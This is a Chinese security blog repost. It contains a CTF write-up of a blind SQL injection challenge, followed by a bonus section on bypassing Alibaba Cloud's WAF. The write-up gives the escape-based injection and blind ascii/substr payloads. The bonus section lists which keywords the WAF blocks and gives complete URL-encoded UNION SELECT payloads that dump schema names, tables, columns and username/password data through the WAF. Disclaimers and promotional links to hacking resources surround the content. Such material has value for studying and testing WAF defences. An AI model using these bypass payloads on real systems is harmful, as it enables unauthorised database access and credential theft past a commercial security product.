SQL-FUZZ技巧及阿里云waf绕过方式

admin
admin
admin
138985
文章
114
评论
2023年9月7日17:19:14评论48 views字数 2338阅读7分47秒阅读模式

免费&进群

SQL-FUZZ技巧及阿里云waf绕过方式
SQL-FUZZ技巧及阿里云waf绕过方式

前言

今天,我们通过一道赛题来与大家分享sql注入的绕过技巧。大家在攻防中经常会遇到各种厂商开源或者商用的waf产品,那么“如何进行合理的绕过”其实是红队攻击人员必备的素养。SQL-FUZZ技巧及阿里云waf绕过方式

01    尝试初步注入,发现很多字符已被过滤。在burp进行 fuzz,暴力破解模块跑sql注入的关键字字典,我们发现基本注入的可能性为0。因为该过滤的字符都已被过滤完毕,没有过滤的按空格substr ascii ^。 SQL-FUZZ技巧及阿里云waf绕过方式


02 扫描发现,robots.txt得到提示——hint.txt,访问 hint.txt。

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

此处知识点——是转义符,可以对’”进行转义,使其失去本来的特殊意义;同时,这里的是没有被过滤。

03    如果传入 username=admin password=123456#,就会变成:

select * from users where username='admin' and password='123456#';

可以理解为:

select * from users where username='admin and password=' 恶意代码 #';

post username=admin password=^(ascii(substr(password,1,1))>1000)#

04    开始进行构造初步payload。

SQL-FUZZ技巧及阿里云waf绕过方式

当 2>4 时,显示 girl friend;

当 2>1 时,显示 BJD needs to be stronger。


此时已经闭合成功。接下来就是直接查询密码即可,因为当前页面就是所调用的用户表,所以直接查询即可。

SQL-FUZZ技巧及阿里云waf绕过方式

05    当盲注 payload 里的ascii值>200时,页面回显如下。

SQL-FUZZ技巧及阿里云waf绕过方式

06    书写脚本即可。

SQL-FUZZ技巧及阿里云waf绕过方式

07    最终爆出密码为OhyOuFOuNdit,账号为admin。

登录即可获取flag。

彩蛋:绕过阿里云fuzz过程分享

当输入and 1=1拦截,waf处于生效状态。SQL-FUZZ技巧及阿里云waf绕过方式

1. 首先进行逻辑符与部分sql注入关键字判断。

and 1=1 拦截

and -1=-1 拦截

and 不拦截

xor 1 异常

xor 0 正常

%26 1=2 异常

%26 1=1 正常

%26 hex(1) 正常

%26 hex(0) 异常

and hex() 不拦截

order by 不拦截

order by 1 拦截

group by 1 不拦截

2. 完整SQL注入的攻击语法如下,可以使用%0A%20—进行绕过,并添加一些关键词。

sql攻击语法:

#获取所有数据库名称

http://cz.aliyun.lvluoyun.com:8080/Tkitn/sqli-labs-master/Less-1/index.php?id=-1%27%20UNION%0A%20-%20%20%20%20%99%20%0A%0A%0ASELECT%201,2,concat%23%0a(schema_name)%20from%20%20/*like%22%0d%0a%20%2d%2d%20%0d%22*/%20%0d%0a%20INFORMATION_SCHEMA%0d%0a.schemata%20limit%204,1--+SQL-FUZZ技巧及阿里云waf绕过方式

#获取当前数据库表名称

Less-1/?id=-1%27%20UNION%0A%20--%20%20%20%20%99%20%0A%0A%0ASELECT%201,2,concat(table_name)%20from%20%20/*like%22%0d%0a%20%2d%2d%20%0d%22*/%20%0d%0a%20INFORMATION_SCHEMA%0d%0a.tables%20where%20table_schema=database()%20limit%201,1--+

#获取users表所有字段

?id=-1%27%20UNION%0A%20--%20%20%20%20%99%20%0A%0A%0ASELECT%201,2,concat(column_name)%20from%20%20/*like%22%0d%0a%20%2d%2d%20%0d%22*/%20%0d%0a%20INFORMATION_SCHEMA%0d%0a.columns%20where%20table_name='users'%20limit%200,1--+

#获取数据

?id=-1%27%20UNION%0A%20--%20%20%20%20%99%20%0A%0A%0ASELECT%201,2,concat(username,0x7e,password)%20from%20users%20limit%202,1--+

#通用用例列表:

SQL-FUZZ技巧及阿里云waf绕过方式


原文地址: https://www.freebuf.com/articles/network/372506.html

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@

学习更多渗透技能!体验靶场实战练习

SQL-FUZZ技巧及阿里云waf绕过方式
hack视频资料及工具
SQL-FUZZ技巧及阿里云waf绕过方式

(部分展示)

往期推荐

给第一次做渗透项目的新手总结的一些感悟

「登陆页面」常见的几种渗透思路与总结!

突破口!入职安服后的经验之谈

红队渗透下的入口权限快速获取

攻防演练|红队手段之将蓝队逼到关站!

CNVD 之5000w通用产品的收集(fofa)

自动化挖掘cnvd证书脚本

Xray捡洞中的高频漏洞

实战|通过供应链一举拿下目标后台权限

实战|一次真实的域渗透拿下域控(内网渗透)

看到这里了,点个“赞”、“再看”吧



原文始发于微信公众号(白帽子左一):SQL-FUZZ技巧及阿里云waf绕过方式

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月7日17:19:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SQL-FUZZ技巧及阿里云waf绕过方式https://cn-sec.com/archives/2014684.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息